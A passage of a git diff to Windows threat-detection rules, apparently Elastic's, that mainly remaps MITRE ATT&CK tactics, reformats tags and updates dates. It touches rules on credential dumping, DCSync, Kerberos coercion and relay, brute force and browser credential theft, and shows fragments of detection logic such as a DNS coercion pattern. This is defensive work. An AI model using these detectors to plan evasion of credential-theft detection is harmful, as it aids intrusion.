"Tactic: Defense Evasion", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", - "Data Source: Elastic Endgame", - "Data Source: Windows Security Event Logs" -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -90,17 +75,36 @@ process where host.os.type == "windows" and event.type == "start" and process.co [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" -[[rule.threat.technique.subtechnique]] -id = "T1219.002" -name = "Remote Desktop Software" -reference = "https://attack.mitre.org/techniques/T1219/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/credential_access_adidns_wildcard.toml b/rules/windows/credential_access_adidns_wildcard.toml index e3c6af87519..6a18ecf1e11 100644 --- a/rules/windows/credential_access_adidns_wildcard.toml +++ b/rules/windows/credential_access_adidns_wildcard.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,16 +83,7 @@ Set-AuditRule -AdObjectPath 'AD:\\CN=MicrosoftDNS,DC=DomainDNSZones,DC=Domain,DC ``` """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Active Directory", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -104,14 +95,26 @@ any where host.os.type == "windows" and event.code == "5137" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_browsers_unusual_parent.toml b/rules/windows/credential_access_browsers_unusual_parent.toml index 7ba940e2c6d..44ceeb7b2a5 100644 --- a/rules/windows/credential_access_browsers_unusual_parent.toml +++ b/rules/windows/credential_access_browsers_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/27" integration = ["windows", "endpoint", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,19 +62,7 @@ references = ["https://www.elastic.co/security-labs/katz-and-mouse-game"] risk_score = 73 rule_id = "46b01bb5-cff2-4a00-9f87-c041d9eab554" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -108,10 +96,25 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1185" +name = "Browser Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1185/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.003" name = "Credentials from Web Browsers" @@ -121,5 +124,3 @@ reference = "https://attack.mitre.org/techniques/T1555/003/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - - diff --git a/rules/windows/credential_access_bruteforce_admin_account.toml b/rules/windows/credential_access_bruteforce_admin_account.toml index 11bbd6482f2..9282a6ec9af 100644 --- a/rules/windows/credential_access_bruteforce_admin_account.toml +++ b/rules/windows/credential_access_bruteforce_admin_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/09" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -135,24 +135,18 @@ from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.001" -name = "Password Guessing" -reference = "https://attack.mitre.org/techniques/T1110/001/" [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml b/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml index d53b19cc348..b1d6834d68b 100644 --- a/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml +++ b/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/09" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -150,24 +150,18 @@ from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.001" -name = "Password Guessing" -reference = "https://attack.mitre.org/techniques/T1110/001/" [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_cmdline_dump_tool.toml b/rules/windows/credential_access_cmdline_dump_tool.toml index 1c55bf1c603..fc208976de4 100644 --- a/rules/windows/credential_access_cmdline_dump_tool.toml +++ b/rules/windows/credential_access_cmdline_dump_tool.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/24" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,20 +65,7 @@ references = [ risk_score = 73 rule_id = "00140285-b827-4aee-aa09-8113f58a08f3" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -120,10 +107,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" @@ -134,27 +123,7 @@ id = "T1003.003" name = "NTDS" reference = "https://attack.mitre.org/techniques/T1003/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/credential_access_dcsync_newterm_subjectuser.toml b/rules/windows/credential_access_dcsync_newterm_subjectuser.toml index 84f640f4534..f694907853e 100644 --- a/rules/windows/credential_access_dcsync_newterm_subjectuser.toml +++ b/rules/windows/credential_access_dcsync_newterm_subjectuser.toml @@ -2,7 +2,7 @@ creation_date = "2022/12/19" integration = ["windows", "system"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,17 +80,7 @@ Audit Directory Service Access (Success,Failure) ``` """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Privilege Escalation", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Resources: Investigation Guide", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Credential Access", "Data Source: Active Directory", "Resources: Investigation Guide", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "new_terms" @@ -106,39 +96,21 @@ event.code:"4662" and host.os.type:"windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.006" name = "DCSync" reference = "https://attack.mitre.org/techniques/T1003/006/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.new_terms] field = "new_terms_fields" value = ["winlog.event_data.SubjectUserName"] diff --git a/rules/windows/credential_access_dcsync_replication_rights.toml b/rules/windows/credential_access_dcsync_replication_rights.toml index 43c9f1c9b13..63a8203908d 100644 --- a/rules/windows/credential_access_dcsync_replication_rights.toml +++ b/rules/windows/credential_access_dcsync_replication_rights.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/08" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,17 +87,7 @@ Audit Directory Service Access (Success,Failure) ``` """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Privilege Escalation", - "Data Source: Active Directory", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "new_terms" @@ -114,39 +104,21 @@ host.os.type:"windows" and event.code:"4662" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.006" name = "DCSync" reference = "https://attack.mitre.org/techniques/T1003/006/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.new_terms] field = "new_terms_fields" value = ["winlog.event_data.SubjectUserSid", "winlog.event_data.ObjectName"] diff --git a/rules/windows/credential_access_dcsync_user_backdoor.toml b/rules/windows/credential_access_dcsync_user_backdoor.toml index e220648179d..836c3cce9ff 100644 --- a/rules/windows/credential_access_dcsync_user_backdoor.toml +++ b/rules/windows/credential_access_dcsync_user_backdoor.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -78,16 +78,7 @@ references = [ risk_score = 47 rule_id = "f8822053-a5d2-46db-8c96-d460b12c36ac" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Active Directory", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -106,19 +97,26 @@ event.code:"5136" and host.os.type:"windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1003.006" -name = "DCSync" -reference = "https://attack.mitre.org/techniques/T1003/006/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/credential_access_disable_kerberos_preauth.toml b/rules/windows/credential_access_disable_kerberos_preauth.toml index f69365d6a48..75151aa640e 100644 --- a/rules/windows/credential_access_disable_kerberos_preauth.toml +++ b/rules/windows/credential_access_disable_kerberos_preauth.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/24" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,18 +68,7 @@ Audit User Account Management (Success,Failure) ``` """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Defense Evasion", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Active Directory", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -91,48 +80,18 @@ any where host.os.type == "windows" and event.code == "4738" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [[rule.threat.technique.subtechnique]] id = "T1558.004" name = "AS-REP Roasting" reference = "https://attack.mitre.org/techniques/T1558/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/credential_access_dnsnode_creation.toml b/rules/windows/credential_access_dnsnode_creation.toml index 4dd21727dec..565abdd5b21 100644 --- a/rules/windows/credential_access_dnsnode_creation.toml +++ b/rules/windows/credential_access_dnsnode_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,16 +83,7 @@ Set-AuditRule -AdObjectPath 'AD:\\CN=MicrosoftDNS,DC=DomainDNSZones,DC=Domain,DC ``` """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Active Directory", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -104,14 +95,26 @@ any where host.os.type == "windows" and event.code == "5137" and winlog.event_da [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_dollar_account_relay.toml b/rules/windows/credential_access_dollar_account_relay.toml index c0418104f42..502e066b3aa 100644 --- a/rules/windows/credential_access_dollar_account_relay.toml +++ b/rules/windows/credential_access_dollar_account_relay.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/24" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/12/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -92,24 +92,13 @@ authentication where host.os.type == "windows" and event.code in ("4624", "4625" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1187" -name = "Forced Authentication" -reference = "https://attack.mitre.org/techniques/T1187/" [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" -[[rule.threat.technique.subtechnique]] -id = "T1557.001" -name = "LLMNR/NBT-NS Poisoning and SMB Relay" -reference = "https://attack.mitre.org/techniques/T1557/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_dollar_account_relay_kerberos.toml b/rules/windows/credential_access_dollar_account_relay_kerberos.toml index 0a76152c2fc..60bb3d0ce29 100644 --- a/rules/windows/credential_access_dollar_account_relay_kerberos.toml +++ b/rules/windows/credential_access_dollar_account_relay_kerberos.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/18" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/10/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -106,6 +106,7 @@ sequence by winlog.computer_name, source.ip with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" @@ -115,15 +116,8 @@ reference = "https://attack.mitre.org/techniques/T1187/" id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" -[[rule.threat.technique.subtechnique]] -id = "T1557.001" -name = "LLMNR/NBT-NS Poisoning and SMB Relay" -reference = "https://attack.mitre.org/techniques/T1557/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml b/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml index 25f74db6270..775ef530d84 100644 --- a/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml +++ b/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/13" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,24 +57,18 @@ file where host.os.type == "windows" and event.type != "deletion" and file.name [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" - -[[rule.threat.technique]] -id = "T1555" -name = "Credentials from Password Stores" -reference = "https://attack.mitre.org/techniques/T1555/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_generic_localdumps.toml b/rules/windows/credential_access_generic_localdumps.toml index 01dd1f39038..82ee68e5f2d 100644 --- a/rules/windows/credential_access_generic_localdumps.toml +++ b/rules/windows/credential_access_generic_localdumps.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/28" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,17 +66,7 @@ references = [ risk_score = 47 rule_id = "220be143-5c67-4fdb-b6ce-dd6826d024fd" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -93,31 +83,31 @@ registry where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/credential_access_iis_connectionstrings_dumping.toml b/rules/windows/credential_access_iis_connectionstrings_dumping.toml index ad8287b9688..7775110a00d 100644 --- a/rules/windows/credential_access_iis_connectionstrings_dumping.toml +++ b/rules/windows/credential_access_iis_connectionstrings_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -95,14 +95,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_kerberos_coerce.toml b/rules/windows/credential_access_kerberos_coerce.toml index 0ddf57939c2..e1d5f33af2f 100644 --- a/rules/windows/credential_access_kerberos_coerce.toml +++ b/rules/windows/credential_access_kerberos_coerce.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/14" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -103,24 +103,18 @@ host.os.type:"windows" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1557" -name = "Adversary-in-the-Middle" -reference = "https://attack.mitre.org/techniques/T1557/" -[[rule.threat.technique.subtechnique]] -id = "T1557.001" -name = "LLMNR/NBT-NS Poisoning and SMB Relay" -reference = "https://attack.mitre.org/techniques/T1557/001/" - [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" reference = "https://attack.mitre.org/techniques/T1187/" +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_kerberos_coerce_dns.toml b/rules/windows/credential_access_kerberos_coerce_dns.toml index 0269e12bbd3..105f030b494 100644 --- a/rules/windows/credential_access_kerberos_coerce_dns.toml +++ b/rules/windows/credential_access_kerberos_coerce_dns.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/14" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/06/14" +updated_date = "2026/03/23" [transform] [[transform.investigate]] @@ -95,24 +95,13 @@ network where host.os.type == "windows" and dns.question.name : "*UWhRC*BAAAA*" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1557" -name = "Adversary-in-the-Middle" -reference = "https://attack.mitre.org/techniques/T1557/" -[[rule.threat.technique.subtechnique]] -id = "T1557.001" -name = "LLMNR/NBT-NS Poisoning and SMB Relay" -reference = "https://attack.mitre.org/techniques/T1557/001/" - [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" reference = "https://attack.mitre.org/techniques/T1187/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_kirbi_file.toml b/rules/windows/credential_access_kirbi_file.toml index 8f5e1c47d75..216c0590ebc 100644 --- a/rules/windows/credential_access_kirbi_file.toml +++ b/rules/windows/credential_access_kirbi_file.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,19 +85,13 @@ file where host.os.type == "windows" and event.type == "creation" and file.exten [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = 